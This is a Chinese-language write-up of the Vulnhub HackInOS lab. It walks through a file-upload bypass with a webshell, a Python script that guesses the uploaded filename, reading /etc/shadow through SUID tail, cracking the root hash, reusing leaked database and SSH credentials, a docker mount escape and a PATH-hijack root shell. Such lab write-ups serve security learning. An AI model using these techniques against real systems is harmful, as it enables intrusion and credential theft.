Vulnhub-HackInOS
原文地址为:http://www.valesec.top/archives/hackinos
环境搭建
HackInOS镜像导入
使用 VirtualBox
导入,然后打开设置,找到网络,点击连接方式,这里使用 仅主机(Host-Only)网络
打开失败,提示如下
Call to NEMR0InitVMPart2 failed: VERR_NEM_INIT_FAILED (VERR_NEM_VM_CREATE_FAILED). 返回 代码: E_FAIL (0x80004005) 组件: ConsoleWrap 界面: IConsole {872da645-4a9b-1727-bee2-5585105b9eed}
使用管理员权限在命令行下执行下面这条命令
bcdedit /set hypervisorlaunchtype off
重启一下电脑,然后发现可以打开了
连通性配置
这里的镜像是在VirtualBox
中的,我们攻击的机器在 VMware Workstation
中,所以需要在 VMware Workstation
中设置一下,点击左上角的编辑,找到虚拟网络编辑器
点击更改设置,添加一条名为 VMnet10
的网卡信息
然后把这块网卡桥接到VirtualBox
的网卡上去,这样网卡部分的联通就做好了
再来设置虚拟机中的网络信息,将新加网卡的连接选择到刚刚创建的网卡上,然后点击确定,开机
查看 Kali Linux
下的网卡及 IP
地址信息
root@kali:~/Desktop# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.88.128 netmask 255.255.255.0 broadcast 192.168.88.255 inet6 fe80::20c:29ff:fe8c:9793 prefixlen 64 scopeid 0x20<link> ether 00:0c:29:8c:97:93 txqueuelen 1000 (Ethernet) RX packets 5 bytes 866 (866.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 9 bytes 1270 (1.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.56.102 netmask 255.255.255.0 broadcast 192.168.56.255 inet6 fe80::20c:29ff:fe8c:979d prefixlen 64 scopeid 0x20<link> ether 00:0c:29:8c:97:9d txqueuelen 1000 (Ethernet) RX packets 2 bytes 1180 (1.1 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 9 bytes 1270 (1.2 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10<host> loop txqueuelen 1000 (Local Loopback) RX packets 12 bytes 640 (640.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 12 bytes 640 (640.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
发现获取到了 VirtualBox
同网段的 IP
地址
主机发现
# root @ kali in ~ [9:15:00] $ arp-scan -I eth1 192.168.56.0/24 Interface: eth1, type: EN10MB, MAC: 00:0c:29:7f:7c:c9, IPv4: 192.168.56.108 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.56.1 0a:00:27:00:00:10 (Unknown: locally administered) 192.168.56.100 08:00:27:10:29:98 PCS Systemtechnik GmbH 192.168.56.107 08:00:27:20:a9:bc PCS Systemtechnik GmbH
这里可以看到目标的 IP
地址为:192.168.56.107
端口扫描
这里还是使用经典的 nmap
进行扫描
# root @ kali in ~ [10:12:43] C:1 $ nmap -A 192.168.56.107 Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-15 10:12 EST Nmap scan report for 192.168.56.107 Host is up (0.0017s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d9:c1:5c:20:9a:77:54:f8:a3:41:18:92:1b:1e:e5:35 (RSA) | 256 df:d4:f2:61:89:61:ac:e0:ee:3b:5d:07:0d:3f:0c:87 (ECDSA) |_ 256 8b:e4:45:ab:af:c8:0e:7e:2a:e4:47:e7:52:f9:bc:71 (ED25519) 8000/tcp open http Apache httpd 2.4.25 | http-robots.txt: 2 disallowed entries |_/upload.php /uploads |_http-title: Blog – Just another WordPress site |_http-generator: WordPress 5.0.3 |_http-open-proxy: Proxy might be redirecting requests |_http-server-header: Apache/2.4.25 (Debian) MAC Address: 08:00:27:20:A9:BC (Oracle VirtualBox virtual NIC) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: Host: 172.18.0.3; OS: Linux; CPE: cpe:/o:linux:linux_kernel
漏洞扫描
这里见到到开放了两个端口,先从 Web
端口开始
这里可以很明显的看到,这是一个由 WordPress
搭建的网站,二话不说,WPScan
一把梭,这里上面已经扫描到 robots.txt
和 upload.php
了使用 WPScan
并没有获取到更有价值的信息
# root @ kali in ~ [10:18:34] C:4 $ wpscan --url "http://192.168.56.107:8000" [+] URL: http://192.168.56.107:8000/ [192.168.56.107] [+] Started: Mon Nov 15 10:19:37 2021 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.25 (Debian) | - X-Powered-By: PHP/7.2.15 | Found By: Headers (Passive Detection) | Confidence: 100% [+] robots.txt found: http://192.168.56.107:8000/robots.txt | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://192.168.56.107:8000/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://192.168.56.107:8000/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] The external WP-Cron seems to be enabled: http://192.168.56.107:8000/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 5.0.3 identified (Insecure, released on 2019-01-09). | Found By: Emoji Settings (Passive Detection) | - http://192.168.56.107:8000/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.3' | Confirmed By: Meta Generator (Passive Detection) | - http://192.168.56.107:8000/, Match: 'WordPress 5.0.3' [i] The main theme could not be detected. [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <============================================================================> (137 / 137) 100.00% Time: 00:00:00
这里先访问 robotx.txt
,发现存在两条信息,发现禁止访问 upload.php
源码泄露
这里来访问 upload.php
这个页面
可以看到此处有个上传点,直接用 BurpSuite
进行抓包,这里上传个空内容,发现提示
<!-- https://github.com/fatihhcelik/Vulnerable-Machine---Hint -->
访问得到源码
<!DOCTYPE html> <html> <body> <div align="center"> <form action="" method="post" enctype="multipart/form-data"> <br> <b>Select image : </b> <input type="file" name="file" id="file" style="border: solid;"> <input type="submit" value="Submit" name="submit"> </form> </div> <?php // Check if image file is a actual image or fake image if(isset($_POST["submit"])) { $rand_number = rand(1,100); $target_dir = "uploads/"; $target_file = $target_dir . md5(basename($_FILES["file"]["name"].$rand_number)); $file_name = $target_dir . basename($_FILES["file"]["name"]); $uploadOk = 1; $imageFileType = strtolower(pathinfo($file_name,PATHINFO_EXTENSION)); $type = $_FILES["file"]["type"]; $check = getimagesize($_FILES["file"]["tmp_name"]); if($check["mime"] == "image/png" || $check["mime"] == "image/gif"){ $uploadOk = 1; }else{ $uploadOk = 0; echo ":)"; } if($uploadOk == 1){ move_uploaded_file($_FILES["file"]["tmp_name"], $target_file.".".$imageFileType); echo "File uploaded /uploads/?"; } } ?> </body> </html>
文件上传
这里可以看到,对文件内容进行过滤,但是不对文件后缀进行限制,这里常用的就是使用 GIF
文件头来绕过,后面加上冰蝎马
这里看到文件已经上传成功了,而且在源码中也已经给出了文件命名规则,就是文件名加上一个不超过 100
的随机数,然后使用 MD5
进行加密,编写脚本进行页面检测
#!/usr/bin/python3 # -*- coding: utf-8 -*- # --author:valecalida-- # Edit time: 2021/11/15 22:20 import hashlib import requests for i in range(101): name = "vulnhub.php" + str(i) file_name = hashlib.md5(name.encode('utf-8')).hexdigest() r = requests.get('http://192.168.56.107:8000/uploads/{}.php'.format(file_name)) if r.status_code == 200: print("[+] Found http://192.168.56.107:8000/uploads/{}.php".format(file_name)) break
运行可以找到我们上传的文件
然后使用冰蝎连接,如果怕不稳定的话,可以在 html
目录下再上传一个,然后重新连接(我就是这么干的)
查看现在的权限及所在目录
/var/www/html/ >id uid=33(www-data) gid=33(www-data) groups=33(www-data) /var/www/html/ >pwd /var/www/html /var/www/html/ >ls index.php license.txt readme.html robots.txt shell.php upload.php uploads wp-activate.php wp-admin wp-blog-header.php wp-comments-post.php wp-config-sample.php wp-config.php wp-content wp-cron.php wp-includes wp-links-opml.php wp-load.php wp-login.php wp-mail.php wp-settings.php wp-signup.php wp-trackback.php xmlrpc.php
然后改善一下交互终端并查找具有高权限的运行命令
# python -c "import pty;pty.spawn('/bin/bash');" # 直接使用冰蝎的虚拟终端就不用在命令执行框中调整交互了 find / -perm -u=s -type f 2>/dev/null www-data@1afdd1f6b82c:/var/www/html$ find / -perm -u=s -type f 2>/dev/null /usr/bin/chsh /usr/bin/gpasswd /usr/bin/passwd /usr/bin/newgrp /usr/bin/tail /usr/bin/chfn /bin/mount /bin/umount /bin/su
这里可以看到 tail
这个命令是具有高权限的,使用这个来查看 shadow
文件
www-data@1afdd1f6b82c:/var/www/html$ tail -c1k /etc/shadow root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7::: daemon:*:17931:0:99999:7::: bin:*:17931:0:99999:7::: sys:*:17931:0:99999:7::: sync:*:17931:0:99999:7::: games:*:17931:0:99999:7::: man:*:17931:0:99999:7::: lp:*:17931:0:99999:7::: mail:*:17931:0:99999:7::: news:*:17931:0:99999:7::: uucp:*:17931:0:99999:7::: proxy:*:17931:0:99999:7::: www-data:*:17931:0:99999:7::: backup:*:17931:0:99999:7::: list:*:17931:0:99999:7::: irc:*:17931:0:99999:7::: gnats:*:17931:0:99999:7::: nobody:*:17931:0:99999:7::: _apt:*:17931:0:99999:7:::
然后使用 john
破解密码
# root @ kali in ~ [9:51:46] $ john hash.txt Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 2 OpenMP threads Proceeding with single, rules:Single Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist john (root) 1g 0:00:00:02 DONE 2/3 (2021-11-15 09:51) 0.4081g/s 1257p/s 1257c/s 1257C/s 123456..john Use the "--show" option to display all of the cracked passwords reliably Session completed
这里可以看到密码爆破成功了,查看密码
# root @ kali in ~ [9:51:55] $ john hash.txt --show root:john:17951:0:99999:7::: 1 password hash cracked, 0 left
这里得到了 root
用户的密码是:john
,切换用户
www-data@1afdd1f6b82c:/var/www/html$ su root Password: root@1afdd1f6b82c:/var/www/html# id uid=0(root) gid=0(root) groups=0(root) root@1afdd1f6b82c:/var/www/html# ls -al /root/ total 36 drwx------ 1 root root 4096 Mar 1 2019 . drwxr-xr-x 1 root root 4096 Feb 23 2019 .. -rw------- 1 root root 57 Mar 1 2019 .bash_history -rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc drwxr-xr-x 2 root root 4096 Feb 24 2019 .nano -rw-rw-rw- 1 root root 28 Feb 28 2019 .port -rw-r--r-- 1 root root 148 Aug 17 2015 .profile -rw-r--r-- 1 root root 169 Feb 9 2019 .wget-hsts -rw-r--r-- 1 root root 27 Feb 28 2019 flag root@1afdd1f6b82c:/var/www/html# cat /root/flag Life consists of details..
这里提示我们要注意细节,我们再进行一波信息收集,首先就是 /root
目录下的 .port
文件
root@1afdd1f6b82c:/var/www/html# cat /root/.port Listen to your friends.. 7*
然后查看 IP
信息,发现 IP
为 docker
内网地址
root@1afdd1f6b82c:/var/www/html# ifconfig eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 172.18.0.3 netmask 255.255.0.0 broadcast 172.18.255.255 ether 02:42:ac:12:00:03 txqueuelen 0 (Ethernet) RX packets 809714 bytes 5538987366 (5.1 GiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 790439 bytes 235593687 (224.6 MiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 360 bytes 19565 (19.1 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 360 bytes 19565 (19.1 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
我们目前拿到的是 docker
主机的 root
权限,我们最终要拿到的应该是宿主机的权限,打包一下 Web
目录
root@1afdd1f6b82c:/var/www# tar -cvf html.tar html/
把文件下载下来,然后对该目录进行审计,这里在 wp-config.php
中找到了数据库账号密码信息
define('DB_NAME', 'wordpress'); /** MySQL database username */ define('DB_USER', 'wordpress'); /** MySQL database password */ define('DB_PASSWORD', 'wordpress'); /** MySQL hostname */ define('DB_HOST', 'db:3306');
这里使用用户名密码:wordpress:wordpress
直接连接到 wordpress
数据库中
root@1afdd1f6b82c:~# mysql -hdb -u wordpress -p wordpress Enter password: Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 96 Server version: 5.7.25 MySQL Community Server (GPL) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [wordpress]>
查看表格中的信息,发现了一列名为:host_ssh_cred
,查看为 ssh
登陆用户名与密码
MySQL [wordpress]> show tables; +-----------------------+ | Tables_in_wordpress | +-----------------------+ | host_ssh_cred | | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ 13 rows in set (0.01 sec) MySQL [wordpress]> select * from host_ssh_cred; +-------------------+----------------------------------+ | id | pw | +-------------------+----------------------------------+ | hummingbirdscyber | e10adc3949ba59abbe56e057f20f883e | +-------------------+----------------------------------+ 1 row in set (0.01 sec)
这里使用 cmd5
破解密码,得到了密码是123456
使用 ssh
登录到目标主机,用户名密码为:hummingbirdscyber:123456
C:\Users\valecalida\Desktop>ssh hummingbirdscyber@192.168.56.101 The authenticity of host '192.168.56.101 (192.168.56.101)' can't be established. ECDSA key fingerprint is SHA256:TW0nX/yND0yHIOROC6P/fnW1FZBF8bZkZUA258XTvD0. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.56.101' (ECDSA) to the list of known hosts. hummingbirdscyber@192.168.56.101's password: Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.15.0-29-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 95 packages can be updated. 0 updates are security updates. *** System restart required *** Last login: Fri Mar 1 23:58:08 2019 from 192.168.1.31 hummingbirdscyber@vulnvm:~$
这里可以看到已经登陆成功了
权限提升
Docker提权
这里查看一下权限信息,发现用户:hummingbirdscyber
属于docker组,再查看一下 IP
信息,发现这是内网
hummingbirdscyber@vulnvm:~/Desktop$ id uid=1000(hummingbirdscyber) gid=1000(hummingbirdscyber) groups=1000(hummingbirdscyber),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker)
我们可以利用 docker
来提权 docker run -it -v /:/root ubuntu /bin/bash
将 /root
路径下的文件映射到 docker
的根目录下
hummingbirdscyber@vulnvm:~/Desktop$ docker run -it -v /:/root ubuntu /bin/bash root@0a513b8ee17a:/# id uid=0(root) gid=0(root) groups=0(root) root@0a513b8ee17a:/# ls bin boot dev etc home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var root@0a513b8ee17a:/# ls /root/root flag root@0a513b8ee17a:/# cat /root/root/flag Congratulations! -ys- /mms. +NMd+` `/so/hMMNy- `+mMMMMMMd/ ./oso/- `/yNMMMMMMMMNo` .` +- .oyhMMMMMMMMMMN/. o. `:+osysyhddhs` `o` .:oyyhshMMMh. .: `-//:. `:sshdh: ` -so:. .yy. :odh +o--d` /+. .d` -/` `y` `:` `/ `. `
t通过这种方式,我们可以获取到 flag
信息
二次提权
但是这里还不是宿主机的 root
权限, 还是需要提权,这里查找一下设置了 SUID
的文件
hummingbirdscyber@vulnvm:~/Desktop$ find / -perm -u=s -type f 2>/dev/null /home/hummingbirdscyber/Desktop/a.out /usr/lib/snapd/snap-confine /usr/lib/openssh/ssh-keysign /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/xorg/Xorg.wrap /usr/sbin/pppd /usr/bin/chsh /usr/bin/gpasswd /usr/bin/passwd /usr/bin/newgrp /usr/bin/sudo /usr/bin/chfn /usr/bin/pkexec /bin/mount /bin/ping6 /bin/ntfs-3g /bin/umount /bin/su /bin/fusermount /bin/ping
这里在 /home/hummingbirdscyber/Desktop/
上发现了一个名为:a.out
的文件,查看一下该文件
hummingbirdscyber@vulnvm:~/Desktop$ ls -al a.out -rwsr-xr-x 1 root root 8720 Mar 1 2019 a.out hummingbirdscyber@vulnvm:~/Desktop$ file a.out a.out: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=c26eb2ef5db60afbef3a4357d92af730870b2fd4, not stripped
发现该文件为可执行文件,运行该文件,发现输出为 root
hummingbirdscyber@vulnvm:~/Desktop$ ./a.out root
这个程序的作用就像是 Linux
系统中的 whoami
一样,这里自己编写一个 whoami.c
文件
#include <stdlib.h> int main(void) { system("/bin/bash -p"); return 0; }
然后编译该文件
hummingbirdscyber@vulnvm:~$ vi whoami.c hummingbirdscyber@vulnvm:~$ gcc -o whoami whoami.c hummingbirdscyber@vulnvm:~$ chmod +x whoami
在信息收集的时候,我在环境变量找到了了有趣的信息
hummingbirdscyber@vulnvm:~$ echo $PATH /home/hummingbirdscyber/bin:/home/hummingbirdscyber/.local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
看到 /home/hummingbirdscyber/bin
路径,这里我们创建 bin
目录,将我们自己的 whoami
拷贝进去,并且赋予运行权限
hummingbirdscyber@vulnvm:~$ mkdir bin hummingbirdscyber@vulnvm:~$ cp Desktop/whoami bin/ hummingbirdscyber@vulnvm:~$ ls bin/ whoami hummingbirdscyber@vulnvm:~$ chmod 755 bin/whoami
然后执行 a.out
,可以看到获取到了 root
权限
hummingbirdscyber@vulnvm:~$ ./Desktop/a.out root@vulnvm:~# id uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),113(lpadmin),128(sambashare),129(docker),1000(hummingbirdscyber) root@vulnvm:~# ls / bin cdrom etc initrd.img lib lost+found mnt proc run snap sys usr vmlinuz boot dev home initrd.img.old lib64 media opt root sbin srv tmp var root@vulnvm:~# cat /root/flag Congratulations! -ys- /mms. +NMd+` `/so/hMMNy- `+mMMMMMMd/ ./oso/- `/yNMMMMMMMMNo` .` +- .oyhMMMMMMMMMMN/. o. `:+osysyhddhs` `o` .:oyyhshMMMh. .: `-//:. `:sshdh: ` -so:. .yy. :odh +o--d` /+. .d` -/` `y` `:` `/ `. `